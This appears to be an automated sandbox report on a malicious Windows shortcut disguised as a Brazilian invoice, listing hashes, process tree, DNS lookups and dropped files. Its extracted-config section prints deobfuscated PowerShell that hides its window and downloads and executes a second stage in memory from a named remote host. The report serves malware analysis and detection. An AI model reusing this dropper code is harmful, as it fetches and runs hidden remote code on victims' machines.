Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20/09/2024, 20:53 UTC

General

  • Target

    NotaFiscal_Danfe_N43553454BR.lnk

  • Size

    2KB

  • MD5

    c3996410f80fd3137feb0f42074c71ca

  • SHA1

    2da7caa8372ddb9e6601a029ed3d2128b5263b08

  • SHA256

    11718e47eee14d48ff490b5443e430607968f9a18d95272e72e128c0c97c6234

  • SHA512

    a706a0cd9c1a0443476067221786518a46c614a91f0937f384c7e8068d2ed85ff05e243e964556b34fc4c363d7296d229a47db1a37e78382825cf4f37294cb78

Score
10/10

Malware Config

Extracted

Language
ps1

Deobfuscated

    # P/Invoke declaration for user32!ShowWindow, compiled on the fly via Add-Type (this is what spawns csc.exe/cvtres.exe in the process tree)
    add-type -name a -memberdefinition "[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int h, int s);" -namespace b
    # Hide the current PowerShell console window (nCmdShow 0 = SW_HIDE) so the victim sees nothing
    [b.a]::showwindow(([system.diagnostics.process]::getcurrentprocess()|ps).mainwindowhandle, 0)
    # Fetch the next stage from the remote host and execute it in memory without writing it to disk
    invoke-expression (new-object net.webclient).downloadstring("https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnw2NDhR%")
5
URLs
ps1.dropper

https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnw2NDhR%

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\NotaFiscal_Danfe_N43553454BR.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en 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
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\orabdere.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2576
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4876.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4875.tmp"
          4⤵
            PID:3016

    Network

    • flag-us DNS sepogy.epiain.com (powershell.exe)
      Remote address: 8.8.8.8:53
      Request: sepogy.epiain.com IN A
      Response: No results found
    • 8.8.8.8:53 sepogy.epiain.com dns powershell.exe 63 B 136 B 1 1
      DNS Request: sepogy.epiain.com

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES4876.tmp

      Filesize

      1KB

      MD5

      2272bf3fbe8396f5d7857c1d1bfcfd91

      SHA1

      8dfd912cb7a13b3849821f66b4b4f9ded7359b73

      SHA256

      0a71415d4a404eeafa1015a35aeef09106e6bb7e83164a81181fffe7860c2087

      SHA512

      a7e14ec8da5d50afb0a668511dc87233c71270c875a33e15f266b1b3dc27a0c8be1e656c6ff8d5f09932799a3a32a28bad9edc769fc618f759dc39e4779d88a2

    • C:\Users\Admin\AppData\Local\Temp\orabdere.dll

      Filesize

      3KB

      MD5

      1a97587d8bcadd756967a8d69440e8a2

      SHA1

      b39a5abcb8281119d0b82b9bd30814a463998681

      SHA256

      838c02ec76fcadef201351a326c96cb8cd0cdbe87c0b30c9beedbad6ea0c68cf

      SHA512

      141444319e5268fb8dc70116cbdeb47c5913680c5af8dee1bd0b049561684bed137c663c800e258be4304c3b84a345edcc3acc796298eba90ec88f5428f5a4e7

    • C:\Users\Admin\AppData\Local\Temp\orabdere.pdb

      Filesize

      7KB

      MD5

      b1b57e1f54d073d9e6040c3d9ee8d48e

      SHA1

      b200d3d9378e2c3fb0bd9640038412206c6eae21

      SHA256

      d170fab5283b33d67d4644c3bf5c32758863271bf0377a3ed602dffe07947f04

      SHA512

      260896d63892c4c71af0d87560e185549fc933971c5611ef83a2588ac25348e42b1376a2cf3cec44419d3288373bf3d86029344ed536602083bf3db1915e2c28

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC4875.tmp

      Filesize

      652B

      MD5

      640b2a30551bfe0d8ec7d66695c2b2dc

      SHA1

      d4bd9ce277bf8b9608dc485f4e4edbd0acde65b3

      SHA256

      45952cf0d1195f632811d0874f978f18703f9498a9d7343562299dcaf635fd0d

      SHA512

      0e354fdfcc4989dc4539142c00ba3ede28bedc0a4481f9f79582e018b5c3fcbca3c182ff0d222488152503b90dd928c3401b073a759e085458939d043349aa7a

    • \??\c:\Users\Admin\AppData\Local\Temp\orabdere.0.cs

      Filesize

      187B

      MD5

      7b0e7177dfbb9edd1c1ef08b4fdfae2f

      SHA1

      cb11a0252cdad66ec247312ccb7feb46456e52b6

      SHA256

      6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

      SHA512

      7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

    • \??\c:\Users\Admin\AppData\Local\Temp\orabdere.cmdline

      Filesize

      309B

      MD5

      6fbf3893d649e4b2cad7ac875cdcee53

      SHA1

      954dc1f600f078200b3c789c12f39c41c694d4af

      SHA256

      04d393ef7424994cfa3ff6fb47158976da4a6b83ceb2ee8be03dde7a8a5baaee

      SHA512

      b055a582f124987f0ac0df4b84efac18a7a8e511ba56017bc89050dc5c2ae535ffee2c0376ba5da0f23b3522ebf6c13e403d38961f9734d44f807edeee09e154

    • memory/2744-42-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-49-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-46-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-38-0x000007FEF575E000-0x000007FEF575F000-memory.dmp

      Filesize

      4KB

    • memory/2744-41-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-40-0x0000000001D90000-0x0000000001D98000-memory.dmp

      Filesize

      32KB

    • memory/2744-58-0x00000000029F0000-0x00000000029F8000-memory.dmp

      Filesize

      32KB

    • memory/2744-39-0x000000001B6A0000-0x000000001B982000-memory.dmp

      Filesize

      2.9MB

    • memory/2744-61-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-62-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB

    • memory/2744-63-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

      Filesize

      9.6MB
